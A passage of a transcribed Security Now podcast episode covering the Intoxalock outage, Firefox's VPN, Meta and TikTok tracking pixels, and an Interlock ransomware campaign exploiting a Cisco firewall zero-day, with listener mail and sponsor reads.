[00:57:51] that this is not a big deal when you're showing us how it can quickly become a big deal and that the responsibility there is, is vast. But as you pointed out it with the right agreements in place, they don't need to care, do they? No, it's frustrating. No. Um, speaking of frustrating,

[00:58:14] the company known as Intoxalock, gotta love the name, uh, provides court, uh, court mandated automotive breathalyzer facilities that are installed into the automobiles of people who a court has come to the determination should be required to provide proof of their alcoholic sobriety through a quick

[00:58:43] built-in breathalyzer breath sample every single time they get behind the wheel and wish to drive their car. Now, since alcoholic breathalyzer technology is tricky and can be a bit flaky, it requires periodic calibration for reliable operation by an authorized calibration facility.

[00:59:09] And the calibration facilities, it turns out, are all tied back to the mothership in the cloud that tracks and reports on all of this. Now that whole system generally works pretty well, but it turns out only so long as a cyber attack does not render Intoxalock's entire periodic

[00:59:37] calibration and reporting infrastructure inoperative. This is exactly what befell Intoxalock Saturday before last on March 14th. So today is the 24th, a full 10 days later, their calibration system remains offline. It's down. Wow.

[00:59:58] The trouble that's now facing a gradually growing number of drivers who need to prove their sobriety to their cars is that the system's firmware has been designed to enforce a zero tolerance policy. In general, no recalibration when, if you don't get a recalibration when it's needed, you don't get to drive.

[01:00:28] Mm-hmm. And you cannot now recalibrate. As a result, as the recalibration system outage stretches on day after day, an increasing number of drivers are unable to use their automobiles. In some cases, Intoxalock is apparently, and this is on a state-by-state basis, apparently able to offer a 10-day calibration extension.

[01:00:55] But that appears, as I said, to be limited by state. A posting on their service status page explains. It writes, Effective immediately, service centers will be able to give your device a 10-day extension while our systems are being restored. Tennessee customers have a service date extension through Tuesday,

[01:01:23] March 24th. That's today. At this time, this extension is not available in Michigan or Washington. Wow. We're actively working toward a resolution and will notify you as soon as anything changes.

[01:01:40] So here we have an interesting case of people's physical lives being meaningfully impacted by a cyber event. Since the calibration and reporting system sounds like it's very data-based, based, I would not be surprised to learn that Intoxalock, although this hasn't been publicly disclosed,

[01:02:11] had fallen victim to a generic ransomware attack which encrypted all of their systems. And in this case, consider the fact that the data that may also have been exfiltrated. Oh, wow. Yes. A list of all the people. Oh, my goodness. Yes. All of the people, extra personal, extra private, and extra sensitive,

[01:02:40] involving the identities and the habits, the drinking habits and the drinking and driving habits of U.S. drivers who have been under court-mandated driving restrictions. That's not the sort of data anyone wished to have floating around the internet. I would argue it makes a social security number look tame by comparison.

[01:03:03] Yeah, this is a huge blackmail target. Honestly, I was going to make some silly joke about, I wonder how many executives didn't get to work on time that day, and then you said what you said, and I thought, actually, it gave me goosebumps. This is horrible. This is awful. This is terrible. Yeah, it's not good. And they apparently are the go-to company for this service.

[01:03:32] Of course. I was looking to see what their status page says today, because this was support. It also made me wonder, while you're looking for that, it also made me wonder if the calibration narrative is pushed by that company so that they can continue to make money even after those breathalyzers are installed. And of course, that's just supposition. But it is a very interesting

[01:04:00] thing to be one of the main companies providing what ends up being sort of a government-mandated device needing to have these regular check-ins. Yeah. And the good news is they have got their systems back up. I went to intoxalock.com slash status, and I'm getting a green bar, systems restored, services and installations resuming.

[01:04:30] So, and it's got lots of instructions for people who are inconvenienced, and there's a mobile app and so forth. So, note, if you received a service date extension in Tennessee during the temporary pause, please return to the service center today on March 24th. Failure to do so may result in an extension or full restart of the interlock program, whatever that means. So, anyway, the good news is, looks like

[01:05:00] they paid ransom or they restored from backups. We don't really know, but they are back up. But if nothing else, this demonstrates that we are, that our cyber world is increasingly interacting with the physical world. And, you know, here it caused people a lot of inconvenience.

[01:05:26] Especially when you've got all of your eggs in one basket or- And as you said, even with the system restored, if they did, if this was a cyber attack and they exfiltrated all their database data, as you said, now there's serious extortion opportunities for anybody important who cares about keeping their past problems with drinking and driving private. Yeah, that's mortifying.

[01:05:55] Okay. So, exactly one week ago, last Tuesday, the 17th, Mozilla posted some welcome news under their heading, more reasons to love Firefox. I don't need any more reasons. I love Firefox, but okay. They wrote, what's new now and what's coming soon? They start their post off rather generically by writing, Firefox is for people who make their own choices online. Apparently, they're saying, you know,

[01:06:24] Chrome people are sheep. I don't know. From what stays private, they wrote, to the tools that help get things done. That commitment to choice shows up throughout the Firefox experience. The AI controls is just the latest example, meaning you can turn them off, making it possible to turn generative AI features off, on, or customize them feature by feature. Over the coming weeks, we'll be rolling out a

[01:06:52] series of updates that build on that. Expect more control where it matters, better protections in the background, and a few new tools that make everyday browsing better. You may even spot a fresh face of Firefox along the way. Okay. Then they, you know, they talk about the ability to turn off any generative AI, a new feature coming in the next Firefox 149, which will allow side-by-side page display,

[01:07:19] and the ability to write and attach notes to tabs. Okay. I'm not sure about the whole AI thing. The side-by-side webpage thing sounds as though it might come in handy for me for podcast production, since I'm often flipping back and forth between Google Docs where I author the page and the source

[01:07:45] information. So that would be cool. But the forthcoming new feature that caught my eye and which I felt sure would interest our listeners was Firefox 149, which drops today on March 24th, its new free built-in VPN.

[01:08:08] They wrote, a free built-in VPN is coming to Firefox. Free VPNs can sometimes mean sketchy arrangements that end up compromising your privacy. And I've often said, you know, don't trust a free VPN from some sketchy provider. Certainly Mozilla is not that. They said, but ours is built, is built from our data

[01:08:34] to be the world's most trusted browser. It routes your browser traffic through a proxy to hide your IP address and location while you browse, giving you stronger protection and protection online with no extra downloads. Users will have 50 gigabytes of data monthly in the US, France, Germany, and UK to start.

[01:09:03] Available in Firefox 149 starting March 24th. In other words, as I said, today. Now, we know that there's been something of a gold rush to VPN services driven by the increasing use of IP-based geolocation to limit underage access to age-restricted internet content and services. Since Firefox's desktop,

[01:09:31] unfortunately, its desktop presence continues to slip in terms of market share. It's down from 6.3 last year, down now, just down to 4.2% desktop share this year. So Mozilla may be hoping that the presence of a built-in

[01:09:51] free VPN service will help. It is worth noting also that it has not escaped, unfortunately, the awareness of legislators that people are rushing to use VPNs in order to get around a state-based location age restriction. And there actually has been some conversation about legislation to prohibit VPN use,

[01:10:21] which, you know, good luck with that. I mean, it's like, hey, you know, those TCP connections, they're pesky. I think we better, we better outlaw TCP. Oh, Lord, could you imagine? Oh, come on, guys. Where does it stop? One place I know it doesn't stop is with our advertisers.

[01:10:46] And, Micah, this would be a great place for us to take a break for a sponsor. I love that. What a great segue. Leo, take it away. Hey, guys, this episode of Security Now brought to you by OutSystems, the number one AI development platform. OutSystems helps businesses bridge the enterprise gap to their agentic future, where the constraints of the past give way to unlimited capacity and scale.

[01:11:15] OutSystems enables businesses of all sizes to build agents that actually do work. Things like take actions, make decisions, and integrate with data more than just answering questions. OutSystems provides the only AI development platform that's unified, agile, and enterprise-proven. Let me explain. Unified because you build, run, and govern apps and agents all in one platform, OutSystems.

[01:11:42] Agile because you now can innovate at the speed of AI, and importantly, without compromising quality or control. It's enterprise-proven because it's trusted by enterprises for some of the most important mission-critical AI applications and durable innovation. OutSystems. It's the secret weapon behind the world's most successful companies. And this isn't just for small apps.

[01:12:05] These are for massive, in many cases, massive, complex systems that are running banks, insurance companies, government services. OutSystems even helps companies with aging IT environments bridge the gap to the AI future without a rip-and-replace nightmare. It almost feels like you could do anything. OutSystems provides the safest and fastest way for an enterprise to go from, we need an AI strategy, to, yeah, we have a functioning AI application.

[01:12:33] Stop wondering how AI will change your business and start building the agents that will lead it. Visit OutSystems.com slash twit to see how the world's most innovative enterprises use OutSystems to build, deploy, and manage AI apps and agents quickly and cost-effectively without compromising reliability and security. That's O-U-T-S-Y-S-T-E-M-S dot com slash T-W-I-T to book a demo.

[01:13:01] OutSystems.com slash twit. Thank you so much for supporting the good work Steve does here at Security Now. Now back to the show. Indeed, we are back to the show. Take it away, Steve. Okay, so I just learned how far tracking pixels, and we now need to put that in air quotes because they are so much more.

[01:13:29] They're easy to miss because much like cookies, the code which their presence on any web page allows to run is completely hidden from us. I mean, it's not that you can't get it, but it's not easy to see. Last Wednesday, the 18th, the security researchers at J Scrambler shared what they had recently learned about what TikTok and Meta are both now doing.

[01:13:58] Their headline was Beyond Analytics, the silent collection of commercial intelligence by TikTok and Meta ad pixels. Okay, and as we're going to see, this writing, J Scrambler's writing is targeted at web merchants who are voluntarily putting these insidious tracking pixels onto their sites

[01:14:27] because this is not something that happens without the site provider's knowledge. This is something that they said, oh, yeah, we want the analytics or we want whatever we're getting in return. So every page that we serve will have a reference to some JavaScript back at Meta or TikTok or wherever,

[01:14:53] basically causing the user's web browser to pull in that resource and invoke whatever that script is. So here's what they explain. They wrote, TikTok and Meta's tracking pixels are quietly harvesting personal data, granular checkout interactions, and detailed commerce intelligence

[01:15:22] from the users of the websites that implement them. The collection is going far beyond what ad attribution requires, creating serious privacy compliance risks and competitive disadvantages for the businesses involved. J Scrambler conducted a runtime analysis of the ad pixels used by TikTok and Meta on actual websites,

[01:15:51] revealing that their default behavior requires immediate attention from every organization that employs them. The analysis focused on large companies in the retail, hospitality and health care sectors. However, it's worth noting that most businesses with an online presence use these tracking pixels on their websites as well.

[01:16:14] Okay, now I'm sure I don't need to tell our listeners that this is not something I, you know, with GRC, would ever consider doing. I'm annoyed that I've given Google any presence at all. But that little search box, you know, that little search box, that's a pro visitor feature. Other than that, you know, GRC may be ancient appearing, but it's also completely devoid of all modern web analytics,

[01:16:42] because I just, I would rather protect my users' privacy. What's so insidious about this is that when a company says, okay, yes, we'll make a query to your ad server to pull in your ad pixel, they have no control over what it does once it gets there. That's the key point.

[01:17:12] It's very much like software that goes out and downloads some other software to enhance itself. If that, if that, if the behavior of that augmented software changes, then the overall product changes after the fact. Yeah. Anyway, J. Scrambler continues writing,

[01:17:35] tracking pixels were once just a small snippet of code on a web page to confirm an ad impression or log a visit. Almost all websites use them to track user behavior, measure ad performance, and optimize marketing efforts. These pixels let businesses see which ads drive traffic, conversations, or sales,

[01:18:01] and provide data to retarget users who showed interest but might not have completed a purchase. What many website owners likely don't realize is that TikTok and Meta's pixels now go far beyond those traditional tracking tags. They collect user emails, phone numbers, and addresses,

[01:18:29] turning seemingly anonymous browsing data into persistent identifiable user profiles. TikTok's pixel, they write, creates three different data records for each user interaction. A primary event record of what the user did, such as viewing a product or adding to a cart.

[01:18:52] A metadata record and a performance record all connected using the same session ID. When personal information, like an email or phone number, appears on a page, TikTok's identity module processes it, normalizes it, and converts it into an SHA-256-style hashed identifier before sending it out. Meta takes a similar approach,

[01:19:22] hashing a wide range of fields, including first and last names, locations, and external identifiers. The hashes are deterministic, meaning they produce the same output for the same input each time. And because the hash is built from predictable data, like emails and phone numbers,

[01:19:45] it's easy to re-identify them by matching those hashes against existing hash data. Meaning that if metadata, I mean, if Meta has your email address and hashes it, they get the same hash. If they have your phone number and hash it, they get the same hash. So when those hashes later pop up out on the web, they know it's you. There's no mystery there. It's not, you are not anonymized.

[01:20:13] And they write, it effectively eliminates anonymization, allowing platforms to recover original user data and build long-term behavioral profiles without the user's knowledge. In practice, this is like a candidate input matching process where emails or phone numbers are compiled or generated, hashed, and then compared against the target hashes to find matches.

[01:20:43] Identity resolution is only part of the problem. Jay Scrambler's research, they wrote, found that TikTok and Meta's ad pixels methodically harvest detailed product-level intelligence and entire customer journeys from merchant websites.

[01:21:05] Meta and TikTok's requests routinely include product names, unit prices, quantities, currency, and total cart values. They also logged specific checkout actions, such as add to cart or add payment info. In other words, stuff that is none of their business.

[01:21:29] Meta's telemetry even records the structure of checkout forms and buttons, providing insight into how a merchant's site is built. Wow. Are they making this data available to the people whose sites they're on? That's wild. This is not a trade. It's totally intrusive for Meta's benefit, and maybe they're selling it.

[01:21:59] Yeah. I mean, it's data that they are aggregating. So I'll just interrupt to note that, you know, you might be thinking, if you might be thinking that none of this is any of Meta's effing business, I would agree with you wholeheartedly. It is so wrong and intrusive. They do it simply because they can. They can.

[01:22:23] Because it's hidden, because web browsers will run by default any JavaScript they're given. And because there's no one looking, there's no one to stop them. J Scrambler continues. Well, and I'll note also, Meta can say, oh, but we hash the data. We anonymize it. No, you don't. You're not throwing in a random token with the hash, because if you did, it wouldn't be useful to you.

[01:22:53] It would then be purely random noise. So they said merchants are unlikely to be aware of the extent to which their websites share data with these tracking pixels.

[01:23:07] While they might know that pixels collect basic conversion information, much of the detailed product-level checkout stage and structural form data is automatically captured or passed through integrations like Shopify with little visibility.

[01:23:27] While businesses might think they're enabling only standard tracking, in reality, they are feeding third-party platforms with a deep, continuous view of their product catalog, pricing, and customer behavior that could potentially benefit larger rivals.

[01:23:48] The implications from a privacy compliance and sensitive data exposure standpoint should be very concerning for any organization using these pixels. J Scrambler found TikTok pixels capturing sensitive data even before a user had the opportunity to make a consent choice. Of course. And in some cases, even after a user had clicked reject all.

[01:24:18] We observed TikTok capturing physical addresses entered into store locator fields at major French and German retailers and transmitting the data back to their servers. Meta's pixel includes a feature called automatic events, which is enabled by default.

[01:24:41] The feature automatically scans page elements and captures information such as checkout interactions and visible payment card details, including the last digits, expiration date, and cardholder name. Why? I mean, I know why, but I just... Full, full spying. Full spying. Yeah, it's absolutely full spying.

[01:25:09] And to do it without any regard of just like... They're not even having to explain themselves because, as you've pointed out, no one's paying attention to this. Yep. Since this... They write, since this is the default behavior and not opt-in, merchants may not be aware that the pixel is collecting this information. The pixel. I love calling... It's like calling it a pixel. Makes it seem, oh, look, it's a little... Yeah, it's a 30-year-old... Exactly.

[01:25:37] On separate sites, Meta captured recipients' full names and delivery addresses when users selected address options during checkout. TikTok's pixel was observed exhibiting similar behavior, harvesting sensitive user data during the checkout process. This included partial payment card details and other personal data provided by the customer.

[01:26:05] Both TikTok and Meta's pixel code can load and begin transmitting data... Hear it again, again. Both TikTok and Meta's pixel code can begin... I'm sorry, can load and begin transmitting data before the website's consent management system has time to block it. Wow.

[01:26:30] Meaning information can leave the browser before the user's choice is applied. Even more... And then they're covered... That's right. Right? They're covered legally because the ops... We asked the user, they said no, but oops, it was too late. Yeah.

[01:26:46] Even more concerning is that data may be transmitted in clear text, occasionally within the request URL itself, exposing sensitive information to browser histories, server logs, intermediaries, and debugging tools. So it wasn't even well done, like a privacy-first approach.

[01:27:07] They said this vulnerability stems not only from the pixel's data collection methods, but also from misconfigurations during its implementation or from issues with the website's underlying architecture. Consequently, the attack surface is significantly broader than a surface-level analysis would suggest.

[01:27:26] The behaviors Jay Scrambler documented put websites in direct conflict with GDPR, CCPA, and other major privacy regulations. The potential violation triggers include consent failures, inadvertent personal data transmission, and financial or address data exposed in logs that outlast the original request.

[01:27:55] In addition, the exposure of partial cardholder data and address information increases the risk for identity theft and secondary data breaches. From a competitive standpoint, merchants need to understand that the pixels they implement... Pixels? I mean, calling it a pixel is so wrong. Yep, I agree. The pixels they implement are not passive measurement tools.

[01:28:24] They are instead active data collection systems that feed proprietary commercial intelligence, such as pricing, product mix, conversions, and customer behavior, directly into the same global advertising platforms that every other merchant on those platforms, including rivals, relies on.

[01:28:50] Larger rivals with bigger ad budgets could benefit because the more data the platform collects from all merchants, the better its targeting becomes. Often, better targeting favors those with the most budget to spend on ads because there's more ads available for choosing.

[01:29:12] To manage these risks, they write, organizations need to do considerably more than just review a pixels documentation. This involves auditing actual pixel configurations, meaning work, and implementing continuous monitoring to catch scope creep, meaning the pixel used to be a cute little thing that only targeted ads, but that was 10 years ago.

[01:29:42] Now, you're downloading a whole suite of spying intelligence where in that cute little pixels JavaScript. They finish where a third-party script begins collecting more data than originally intended. Exactly so. Wow. Jeez Louise. That's frustrating. It's commerce, you know, getting away with everything it can. And of course, why wouldn't they?

[01:30:12] You know, we're talking meta. They're an aggressive commercial organization, and they've, you know, convinced the whole world to put their cute little tracking pixels everywhere. Yikes. Okay. Okay. As we know, no one is an island. Unfortunately, that's a problem if you don't get any messages.

[01:30:38] I suppose we should not be surprised that Russia's increasingly stringent and pervasive internet stranglehold is choking their own local companies.

[01:30:51] Russia's private sector is desperately asking their government to lift the recently imposed total bans on Telegram, WhatsApp, and other foreign messaging platforms.

[01:31:08] It seems that not everything needed to conduct business in Russia can be found within Mother Russia and that Russian entities need to conduct and work with foreign partners. And unfortunately, Russia is saying, no, we don't want you to be using, you know, they've got their own. I can't remember now what it's called.

[01:31:36] They did a native Russian messaging app, which, of course, no one wants to use because we know that Russia is spying on it. So nobody outside Russia wants to have anything to do with some Russia spyware. Who knows what it does once it gets into their machines? Another bit of news. I saw this blurb in a security news summary, and I thought, OK, well, that's interesting. Let me share it first.

[01:32:04] Then I'll tell everyone what I thought. The security news blurb was titled Open Claw Phishing Campaign. And it just said. Threat actors are spamming GitHub issues and tagging other developers with fake promises of Open Claw tokens.

[01:32:27] The plan is to lure the devs to phishing sites where they're asked to connect their crypto wallets, but are getting their accounts emptied. OK, so that's all we know. I don't ever want to see anyone hurt, of course, really. I don't ever.

[01:32:49] But anyone who would naively connect their crypto wallet containing any amount of crypto, which they're not entirely prepared to be separated from in the next moment, especially if they consider themselves to be savvy enough to be a developer,

[01:33:15] they would have a difficult time extracting much sympathy from me, even though I would never want them to be hurt. I mean, really, you know, you sometimes need an object lesson. And someone who's making those mistakes needs perhaps an object lesson. And I just hope it's not too expensive a lesson. I would certainly be sorry that if anyone were scammed, but I would not be very surprised.

[01:33:40] So our takeaway here is please, please always be careful, you know, especially anytime you're connecting any wallet to any sort of automated system, which you cannot be 100 percent certain of. You know, really like set up a secondary wallet, transfer a little bit of working money there, and then, you know, use that if you must connect it to something.

[01:34:08] But, you know, not your wallet where you actually store any useful amount of money. Since we previously touched upon Cisco's very bad 10.0 CVE 2026-20127,

[01:34:29] which was that widely exploited authentication zero day discovered while being exploited in Cisco's Catalyst SD-WAN enterprise product line. Really, anyone could be forgiven for confusing that one with Cisco's CVE 2026-20131.

[01:34:55] So not 27, no, 31, which is another, wait for it, CVSS 10.0 critical vulnerability in Cisco's systems. As I said at the top of the show, what would the Security Now podcast be without a brand new shiny Cisco CVSS critical 10.0?

[01:35:21] The NIST NVD, the National Vulnerability Database, says of the new one, 31, they write, a vulnerability in the web-based management interface, who would have guessed, of Cisco's Secure Firewall Management Center, apparently not that secure, software,

[01:35:47] could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device. In other words, there you go, Cisco 10.0. Woo-hoo! They wrote, this vulnerability is due to insecure deserialization of a user-supplied Java byte stream.

[01:36:14] An attacker could exploit this vulnerability by sending a crafted, serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. That's right.

[01:36:36] Unfortunately, most of the world that's not listening to this podcast has not caught up to the many continuing demonstrations that authentication does not work.

[01:36:50] If authentication did work, then unauthenticated hackers and attackers would not and could not be continuously breaking into supposedly protected systems in ways that bypass their authentication control. Right? I mean, one plus one equals two.

[01:37:11] Not to mention, oh, I don't know, allowing them to execute their arbitrary Java code as root on breached devices. And so what happens to enterprises who solely rely upon Cisco's broken authentication promises to protect their perimeters?

[01:37:33] Last Wednesday, the 18th, Amazon's threat intelligence posted their observation under the headline, Amazon threat intelligence teams identify interlock ransomware campaign targeting enterprise firewalls. Gee, which enterprise firewall do you think that could be?

[01:37:56] Amazon's threat hunters wrote, quote, Amazon threat intelligence has identified an active interlock ransomware campaign exploiting CVE 2026-20131,

[01:38:13] a critical vulnerability in Cisco secure firewall management center software that could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device, which was disclosed by Cisco on March 4th, 2026. Now, that's an important date. March 4th, 2026. Disclosure means patch available on March 4th, 2026.

[01:38:43] They wrote, they, Amazon. After Cisco's disclosure, Amazon threat intelligence began research into this vulnerability using Amazon's MadPots Global Sensor Network, a system of honeypot servers that attract and monitor criminal cyber activity,

[01:39:07] while looking for any current or past exploits of this vulnerability. Our research found that interlock was exploiting this vulnerability 36 days before its public disclosure, beginning January 26, 2026. This wasn't, they write, this wasn't just another vulnerability exploit.

[01:39:36] Interlock had a zero day in their hands, giving them a five-week head start to compromise organizations before defenders even knew to look. Upon making this discovery, we shared our findings with Cisco to help support their investigation and protect customers. Okay, so just so that everyone is clear about the timing of this again,

[01:40:05] Amazon discovered exploitation of this zero day dating back as far as January 26th. And Cisco's announcement and patch wasn't made available until March 4th. So for at least 36 days or a little more than five weeks, only the bad guys knew of this and even fully patched and up-to-date Cisco secure firewalls.

[01:40:34] And the enterprises behind them were being compromised and falling victim to this interlocked ransomware and campaign through no fault of theirs. Those, they were fully patched and updated. Amazon explained what they found, writing a misconfigured infrastructure server, essentially a poorly secured staging area used by the attackers.

[01:41:01] They actually found a misconfigured infrastructure server of the attackers exposed, they wrote, interlocks complete operational toolkit. This rare mistake provided Amazon's security teams with visibility into the ransomware group's multi-staged attack chain,

[01:41:26] custom remote access Trojans, backdoor programs that give attackers control of compromised systems, reconnaissance scripts, meaning automated tools for mapping victim networks, and evasion techniques. In other words, Amazon has honeypots. The bad guys infected a honeypot. Amazon was able to use the infection to track backwards up into the attacker's infrastructure,

[01:41:53] which they found improperly set up so they were able to get in. Now, what if, maybe I'm writing a movie now, but what if that was just a reverse honeypot? And it points Amazon down the wrong route when they found all this data. That could be possible. Although, what they worked from was Cisco's fresh disclosure.

[01:42:17] So, they had evidence that that system was attacking their honeypot back as many as 36 days earlier using information that was not public. So, nobody knew how it could be used to get into their customers' machines. We're at an hour and a half in.

[01:42:45] Let's take a break, and then I'm going to finish up with what Amazon tells us about this interesting and unfortunately all too common Cisco vulnerability. I will say the magic words to summon Leo Laporte. Bippity boppity Laporte. Boo! Boo! Boo! Boo! Boo! Boo! Boo! Boo! Boo! Boo! Boo! You know, we talk about this all the time.

[01:43:13] The potential rewards of AI are far too great for any company to ignore, but so are the risks, right? Loss of sensitive data, attacks against enterprise-managed AI. Generative AI increases opportunities for threat actors, helping them to rapidly create phishing lures, write malicious code, and automate data extraction. Did you know there were 1.3 million instances of social security numbers leaked to AI applications last year?

[01:43:41] ChatGPT and Microsoft Copilot saw nearly 3.2 million data violations. Yikes! It's time to rethink your organization's safe use of public and private AI. And if you want to know more, just check out what Siva, the Director of Security and Infrastructure at Zuora, says about using Zscaler to prevent AI attacks. Watch. With Zscaler being in line in a security protection strategy helps us monitor all the traffic.

[01:44:10] So even if a bad actor were to use AI, because we have a tight security framework around our endpoint, helps us proactively prevent that activity from happening. AI is tremendous in terms of its opportunities, but it also brings in challenges. We're confident that Zscaler is going to help us ensure that we're not slowed down by security challenges, but continue to take advantage of all the advancements. Thank you, Siva.

[01:44:35] With Zscaler Zero Trust plus AI, you can safely adopt generative AI and private AI to boost productivity across the business. Their Zero Trust architecture plus AI helps you reduce the risks of AI-related data loss and protects against AI attacks to guarantee greater productivity and compliance. Learn more at zscaler.com slash security. That's zscaler.com slash security.

[01:45:03] We thank him so much for supporting security now. Now I see Steve's all caffeinated, so let's get back to the show. Let's do it, Steve. How did he know? That's a big cup. Okay, so just to finish on Amazon's threat intelligence, they wrote, AWS infrastructure and customer workloads on AWS were not observed to be involved in this campaign, meaning Cisco customers, not Amazon customers.

[01:45:32] They said, This advisory shares comprehensive technical analysis and indicators of compromise to help organizations identify potential compromise and defend against interlocks operations, right? I mean, this was going on for 36 days. Anybody who the bad guys could find who had this firewall may well have been compromised. So, you know, a true problem. They said,

[01:46:00] Amazon threat intelligence identified threat activity potentially related to this CVE-20131 beginning January 26th. Observed activity involved HTTP requests to a specific path in the affected software. Request bodies contained Java code execution attempts and two embedded URLs.

[01:46:23] One used to deliver configuration data supporting the exploit and another designed to confirm successful exploitation by causing a vulnerable target to perform an HTTP put request and upload a generated file. So that was the compromised system sending stuff back up to the bad guys' infrastructure. They said multiple variations of these URLs were observed during across different exploit attempts.

[01:46:51] To advance the investigation and obtain additional threat intelligence, we performed the expected, so they were pretending to be infected, we performed, we Amazon, the expected HTTP put request with the anticipated file content. Essentially, we pretended to be a successfully compromised system. This successfully prompted Interlock to proceed to the next stage,

[01:47:20] issuing commands to fetch and execute a malicious ELF binary, a Linux executable file from a remote server. So that suggests that the Cisco firewall is Linux-based. And so this was downloading Linux malware into and to be run by the Cisco firewall. They said when analysts retrieved the binary, they discovered the same host, that is the hacker-controlled server,

[01:47:50] is used for distributing Interlock's entire operational toolkit. The exposed infrastructure organized artifacts into separate paths corresponding to individual targets, with the same paths used for both downloading tools to compromise hosts and uploading operational artifacts back to the staging server. And if they were able to look around in there, they may have seen all the uploads from all the infected systems.

[01:48:17] No one's talking about how many systems were infected, but my guess is Amazon knows and Cisco probably knows and hopefully is not happy about it. They said that ELF binary and associated artifacts are attributable to the Interlock ransomware family based on convergent technical and operational indicators. The embedded ransom note, the ransom note and the Tor negotiation portal

[01:48:43] are consistent with Interlock's established branding and infrastructure. The ransom note's invocation of multiple data protection regulations. Oh, you got to love that. You are in you. We just attacked you and infected you. And now we've exfiltrated your data, which puts you in violation of various data protection regulations. Congratulations. Oh, by the way. Yes. Congratulations. So they said,

[01:49:12] the ransom note's invocation of multiple data protection regulations reflects Interlock's documented practice of citing regulatory exposure to pressure victims, essentially threatening organizations, not just with data encryption and exfiltration, but with regulatory fines and compliance violations. Wow. It's clever. It's clever.

[01:49:41] They're bold. The campaign specific organization identifier embedded in the note aligns with Interlock's per victim tracking model. Interlock has historically targeted specific sectors where operational disruption creates maximum pressure for payment. Education represents the largest share of their activity,

[01:50:04] followed by engineering, architecture, and construction firms, manufacturing and industrial organizations, healthcare providers, and government and public sector entities. Amazon's posting then goes into very interesting and rich detail. It's certainly relevant to anyone who may have fallen victim to this or anyone who might worry that they may have. But what matters most is the way Amazon's threat intelligence group concludes.

[01:50:34] They write, The real story here isn't just about one vulnerability or one ransomware group. It's about the fundamental challenge zero-day exploits pose to every security model. When attackers exploit vulnerabilities before patches exist.

[01:50:57] Even the most diligent patching programs cannot protect you during that critical window. This is precisely why defense in depth is essential. Layered security controls provide protection when any single control fails or hasn't yet been deployed. Rapid patching remains foundational in vulnerability management.

[01:51:27] But defense in depth requires organizations, I'm sorry, helps organizations not to be defenseless during the window between exploit and patch. Right? So there you have it.

[01:51:42] The point Amazon is making is that if there is no defense in depth, if everything relies upon that single point which could fail and we see keeps failing, an organization's security perimeter could be breached even if they did absolutely nothing wrong.

[01:52:07] During that at least five-week interval, any fully patched and fully up-to-date Cisco firewall could have been successfully breached through no fault of their IT managing staff. Unfortunately, this is not what we normally see.

[01:52:29] We are usually noting that lax and lazy and inattentive IT was at fault, at least at fault, for not keeping their equipment up to date. Right? Like if patch was available months ago and they still hadn't got around to updating. But not so this time.

[01:52:52] As Amazon reminds us, defense in depth is needed because it's never safe to depend entirely upon any single security control. Anytime any management portal is exposed to the entire global internet where access is controlled by some form of authentication,

[01:53:14] the security of the entire organization now rests upon that single point which could fail. And that state of affairs would be acceptable if nothing more could be done. Right? If we've done everything and we still have a single point of failure, if nothing more could be done, then okay. I guess that's the best we can do.

[01:53:41] But it is almost always the case that additional parallel protections could be erected so that, for example, almost no one is even able to see that possibly vulnerable authentication interface.

[01:54:00] No one in China, no one in North Korea, no one in Iran, no one in Russia can even get to because there's port filtering that blocks their access to that authentication interface. Unless you really need everybody in the world to be able to guess your password, don't give them the opportunity. So then arguably, you said in this case, the IT did everything right.

[01:54:29] But it seems like you are also arguing that they didn't because doing everything right would also mean that you have security in depth. Right. Yeah. So that's a very good point. What I meant was IT was at least keeping everything patched. Got it. But this demonstrates that even keeping everything patched is really no longer enough. You need other layers.

[01:54:55] And if somebody had other layers, although you wouldn't want to be lax on patching, at least being lax on patching, like being a few weeks or months late, well, you wouldn't get infected because bad guys couldn't even attempt to infect your system.

[01:55:14] So really, you know, we would know that the the the jargon that I've been using most recently that that I used at Zero Trust World and and before was really bringing stronger meaning to least privilege. You want least privilege to apply.

[01:55:37] Why? It is a privilege if someone in China has the opportunity to guess your password. Why? Why have you given Chinese attackers the the privilege of doing that? They shouldn't even be able to see that you have a management interface. You know, they should be blocked by simple IP based filtering. And it's so easy to do.

[01:56:02] But everyone says, oh, look, Cisco, you know, they have a you know, we oh, we got security. No, you need your security needs security. I like that. That's that's a shirt for security. Now your security and security, your security needs security. OK, so finally, before we talk about listener feedback, I just did want to mention that Cisco is not alone last Wednesday and then updated on Saturday.

[01:56:31] Ubiquity released a security update to Patrick Critical. Cisco, also one of the rare, you know, it used to be the CVSS 10.0 were rare, right? Nobody had them. Like the worst you would see was a 9.8. And we would joke about, oh, you got to try real hard to get up to a 10.0. Well, unfortunately, Cisco has put the lie to that because they're getting them all the time now. In this case, so did Ubiquity.

[01:56:58] A CVSS 10.0 was discovered in its Unify Internet Gateway and Wi-Fi management application. The flaw enabled a path traversal exploit that could allow threat actors to access the device's configuration files as never good and take over Unify gateways that way. So Ubiquity Unify users are advised to update. I know we've got a bunch of Ubiquity users and Unify users.

[01:57:28] Leo is a big proponent. It's one of them. So everybody should update. Okay. Some listener feedback. Vern Mastel, he said his email had the subject clocks, cursive, and coding with AI. And he wrote, Steve, we already have many children who cannot tell time on an analog clock.

[01:57:55] Many school systems began phasing out cursive writing a decade or more ago. In another generation, the ability to read and write cursive will fall into the category of arcane skills understood and practiced by only grizzled old professors in dusty, cluttered offices. He said, for decades, we've been teaching students how to code. With advances in AI, it seems clear that this too will cease.

[01:58:24] Why bother when you can have an AI bang out apps in minutes? It seems likely that in the near future, old school style programming will also become an arcane skill known and understood by only a few. I have to agree.

[01:58:44] I think we're very clearly seeing that actually writing code will change into managing its authorship by AI devices. That clearly seems to be where we're headed. And I remind everyone, what we have today is not what we're going to have tomorrow. It's going to be getting way, way better.

[01:59:09] Jeffrey Koh wrote, hey, Steve, since it's getting close to tax time, I thought you might enjoy seeing the IRS version of the click fix exploit. And he said, I blurred out the script. He said, I'm a longtime listener. Every episode, spin ride owner, regards Jeffrey, Jeffrey D. Koh.

[01:59:30] So, and he attached in his email a picture of an internal revenue service, Department of the Treasury sent from Austin, Texas with their zip code. It's letter number 1058. And it says, final notice. Notice of intent to levy and notice of your right to a hearing. Address E, Jeffrey. And then we have a case ID.

[01:59:59] And it says, you must respond within seven, parans, numeral seven, calendar days. Your account has been selected for an office examination. Internal Revenue Code Section 7602 authorizes the IRS to require you to appear and provide records. We've identified a mismatch between the income on your tax return and data received from payers.

